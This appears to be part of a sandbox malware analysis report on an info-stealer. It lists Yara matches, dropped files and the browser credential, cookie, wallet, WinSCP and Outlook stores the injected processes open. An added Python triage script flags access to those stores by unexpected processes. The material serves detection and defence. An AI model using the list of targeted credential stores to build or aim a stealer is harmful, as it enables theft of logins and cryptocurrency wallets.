Source: Yara match File source: 00000018.00000000.2743120667.0000000000561000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2784341103.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F557.exe, type: DROPPED
Source: Yara match File source: 00000023.00000003.2810520451.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2809730416.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2986526967.0000000005095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2222138286.0000024ABA9F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2775779398.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2105828144.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2511978999.0000024ABABF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2179795455.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.3073347750.0000022CBCA81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3026163870.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109261264.0000000003610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\startupCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\trash4675
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing\google4
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\thumbnails
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
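The listing above is the stealer payload, running inside OpenWith.exe and the injected explorer.exe, walking browser credential stores (Chrome and Edge Login Data, Web Data and Network\Cookies; Firefox cookies.sqlite and its -wal/-shm companions), wallet registry keys, WinSCP session settings and the Outlook MAPI profile. The useful triage signal is not the paths themselves but the mismatch between the path and the image opening it. The script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's own "Source: <image> File opened|Key opened: <target>" form and flags credential-store access by any image that is not the store's normal owner. The store patterns and the per-store owner allowlist are assumptions chosen for this example; the sample lines are copied from the listing above, plus one constructed chrome.exe control line.

```python
import re
from dataclasses import dataclass

# One report line: "Source: <image path> File opened|Key opened: <target>[ Jump to behavior]"
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+(?P<kind>File opened|Key opened):\s+"
    r"(?P<target>.+?)(?:\s+Jump to behavior)?$"
)

# (label, pattern matched against the target, image names expected to open it).
# Owner allowlist is an assumption for this example, not something the report states.
STORES = [
    ("Chromium credential/cookie/autofill DB",
     re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\(Login Data|Web Data|Network\\Cookies)$", re.I),
     {"chrome.exe", "msedge.exe"}),
    ("Firefox cookie/credential DB",
     re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(cookies\.sqlite(?:-wal|-shm)?|key4\.db|logins\.json)$", re.I),
     {"firefox.exe"}),
    ("Cryptocurrency wallet registry key",
     re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\(Bitcoin|monero-project)\\", re.I),
     {"bitcoin-qt.exe", "monero-wallet-gui.exe"}),
    ("WinSCP stored-session settings",
     re.compile(r"^HKEY_CURRENT_USER\\Software\\Martin Prikryl", re.I),
     {"winscp.exe"}),
    ("Outlook MAPI profile",
     re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook", re.I),
     {"outlook.exe"}),
]


@dataclass(frozen=True)
class Finding:
    process: str   # lower-cased image name, e.g. "explorer.exe"
    store: str     # label from STORES
    target: str    # file path or registry key that was opened


def parse_line(line):
    """Return (image name, kind, target) for a behaviour line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    image = m.group("proc").rsplit("\\", 1)[-1].lower()
    return image, m.group("kind"), m.group("target").strip()


def classify(target):
    """First store whose pattern matches the target, as (label, owners), else None."""
    for label, pattern, owners in STORES:
        if pattern.search(target):
            return label, owners
    return None


def triage(lines):
    """Findings for every sensitive-store access by an image that is not an expected owner."""
    findings, seen = [], set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        image, _kind, target = parsed
        hit = classify(target)
        if hit is None:
            continue
        label, owners = hit
        if image in owners:
            continue                      # browser reading its own profile: expected
        key = (image, label, target)
        if key not in seen:               # the report repeats lines; count each access once
            seen.add(key)
            findings.append(Finding(image, label, target))
    return findings


def summarize(findings):
    """Map each offending image to the sorted list of store categories it touched."""
    out = {}
    for f in findings:
        out.setdefault(f.process, set()).add(f.store)
    return {proc: sorted(stores) for proc, stores in out.items()}


# Lines copied from the report listing above (the "Jump to behavior" suffix is page residue).
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm",
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior",
    r"Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior",
    r"Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior",
    r"Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl",
    r"Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior",
    r"Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store",
    r"Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2",
]
# Constructed control line (not from the report): the browser itself opening its own store.
CONTROL_LINE = r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"
SAMPLE_LINES = REPORT_LINES + [CONTROL_LINE]

if __name__ == "__main__":
    for proc, stores in summarize(triage(SAMPLE_LINES)).items():
        print(f"{proc}: {', '.join(stores)}")
```

Run as-is, the script reports explorer.exe against four store categories and OpenWith.exe against three, while the chrome.exe control line is ignored. The directory walks of cache2 and optimization_guide_model_metadata_store deliberately do not match: profile enumeration is noisy, credential files are not. The owner allowlist is keyed on image name only, which is adequate for this sample because the payload is hosted in OpenWith.exe and explorer.exe, but a stealer injected into the browser process itself would pass it; on a live host, pair the same logic with process-ancestry or injection telemetry rather than relying on the image name alone.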

Remote Access Functionality

Source: Yara match File source: 00000023.00000003.2810520451.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2809730416.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2986526967.0000000005095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
